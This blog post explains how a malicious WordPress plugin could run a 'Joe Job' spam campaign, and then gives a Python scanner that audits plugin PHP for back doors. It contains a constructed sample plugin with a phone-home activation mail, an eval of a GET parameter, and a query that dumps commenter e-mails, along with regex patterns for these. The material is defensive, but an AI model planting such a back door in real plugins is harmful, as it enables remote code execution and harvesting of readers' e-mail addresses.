A Joe Job is a spam campaign in which the users of a site are sent spoofed e-mails that appear to come from that site. The e-mails are filled with all kinds of spam and are intended to tarnish, and permanently damage, the reputation of the site's owner. Readers who receive such e-mails may reply in anger, report the site to spam authorities, and even launch attacks of their own.
As a WordPress plugin and theme author, I find it scary that most WordPress blogs could easily become victims of such Joe Jobs. All a plugin or theme author would have to do is build some kind of back door into their code. If a popular enough site has the plugin or theme installed (and the author is malicious enough), the author can execute that code remotely and all hell can break loose.
Do you think this scenario is too unrealistic? It’s already happened on a large scale on WordPress 2.1.1 (although no damage really occurred).
Here’s what a modern-day WordPress Joe Job would look like.
User Installs Theme or Plugin With Malicious Code
When the plugin or theme is activated, the author of the malicious code is e-mailed. Obviously if the author knew what they were doing, none of this would be traceable.
Since the author is e-mailed, the author knows exactly which blogs have his/her code ready to be executed.
Author Runs Malicious Code on User’s Site
The author then runs the code on the user’s site and is sent the e-mail address of every commenter the site has ever had.
Armed with e-mail addresses, the author is ready to start the Joe Job.
Readers Are Sent Spoofed E-mails
A highly targeted spam campaign is waged against the readers of the user’s site. The user’s return e-mail address is used, and readers are more than happy to express their dissatisfaction.
Readers send in e-mails wondering what is going on, feed subscribers unsubscribe, and the readers start leaving nasty comments. Readers who have blogs begin to blog about this user in a very negative way.
The user has no idea what has happened and what the cause is. And the author of the malicious code is just lurking in the background as the readers of the site rebel.
Hardly. When was the last time you checked the code of your plugins or themes? You never know what you might find and how trustworthy the plugin or theme author really is.
Fortunately the WordPress community is very vigilant and something like this wouldn’t last long. But it is always a good idea to make sure the plugins or themes you install are legit.
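As an added example (not code from the original post, and not a WordPress or WordPress.org tool), here is a small Python script that audits plugin or theme PHP source for the three ingredients of the scenario above: an activation hook whose callback sends mail, code execution driven by request parameters, and bulk reads of commenter e-mail addresses. The sample plugin it scans is constructed for this example, and the rule names and the `scan_php`, `function_body` and `scan_tree` helpers are assumptions of mine, not a WordPress API.

```python
"""Static audit of WordPress plugin/theme PHP for back-door indicators.

Constructed example: the rules are broad indicators, not proof of malice.
A hit means "read this code before trusting it", nothing more.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line in the PHP source
    rule: str      # which indicator fired
    snippet: str   # the offending line, or a short explanation


# Single-line indicators: (rule name, regex).
RULES = [
    # eval/system/... fed directly from request data: remote code execution
    ("exec-of-request-data",
     re.compile(r"\b(eval|assert|create_function|system|exec|shell_exec|passthru)"
                r"\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    # eval of an obfuscated blob: hides what the code really does
    ("decoded-payload",
     re.compile(r"\b(eval|assert|create_function)\s*\(\s*"
                r"(base64_decode|gzinflate|str_rot13|gzuncompress)\b", re.I)),
    # include/require of a remote URL: code controlled by someone else
    ("remote-include",
     re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]?https?://", re.I)),
    # reading commenter addresses: the raw material for a Joe Job
    ("comment-email-harvest", re.compile(r"comment_author_email", re.I)),
]

# Multi-line indicator: activation hook whose callback sends mail (phone-home).
ACTIVATION_HOOK = re.compile(
    r"register_activation_hook\s*\([^,]+,\s*['\"]([A-Za-z_][A-Za-z0-9_]*)['\"]")
MAIL_CALL = re.compile(r"\b(wp_mail|mail)\s*\(")


def function_body(src: str, name: str) -> Optional[Tuple[int, str]]:
    """Locate `function name(...) { ... }` and return (start line, body) by brace counting."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    open_brace = src.find("{", m.end())
    if open_brace == -1:
        return None
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[:m.start()].count("\n") + 1, src[open_brace:i + 1]
    return None  # unbalanced braces: give up rather than guess


def scan_php(src: str) -> List[Finding]:
    """Return all findings for one PHP source text, sorted by line."""
    findings: List[Finding] = []
    for no, line in enumerate(src.splitlines(), 1):
        for rule, rx in RULES:
            if rx.search(line):
                findings.append(Finding(no, rule, line.strip()))
    for hook in ACTIVATION_HOOK.finditer(src):
        callback = hook.group(1)
        located = function_body(src, callback)
        if located and MAIL_CALL.search(located[1]):
            findings.append(Finding(located[0], "mail-on-activation",
                                    f"{callback}() sends mail when the plugin is activated"))
    findings.sort(key=lambda f: f.line)
    return findings


def scan_tree(root: str) -> dict:
    """Scan every .php file under root (e.g. wp-content/plugins); returns {path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample exhibiting the three steps described in the post.
SAMPLE_PLUGIN = """<?php
/* Plugin Name: Example Widget (constructed sample for this scanner, not a real plugin) */
register_activation_hook(__FILE__, 'ew_activate');
function ew_activate() {
    wp_mail('author@example.invalid', 'activated', get_site_url());
}
add_action('init', function () {
    if (isset($_GET['ew_task'])) { eval($_GET['ew_task']); }
});
function ew_export_emails() {
    global $wpdb;
    return $wpdb->get_col("SELECT comment_author_email FROM {$wpdb->comments}");
}
"""

# Constructed benign plugin: an activation hook that only stores an option.
BENIGN_PLUGIN = """<?php
register_activation_hook(__FILE__, 'ok_activate');
function ok_activate() {
    add_option('ok_installed', 1);
}
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PLUGIN):
        print(f"line {f.line:>3}  {f.rule:<24} {f.snippet}")
```

Point `scan_tree` at a site's wp-content/plugins or wp-content/themes directory to get a per-file list of lines worth reading. The regexes are deliberately loose: a legitimate comment-notification plugin will also touch comment_author_email, so treat each hit as a prompt to read the surrounding code, and treat a clean scan as no guarantee, since obfuscation the rules do not cover is easy to write.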
A Joe Job can be devastating for any site, but a Joe Job targeted at a site’s readers can be even more so.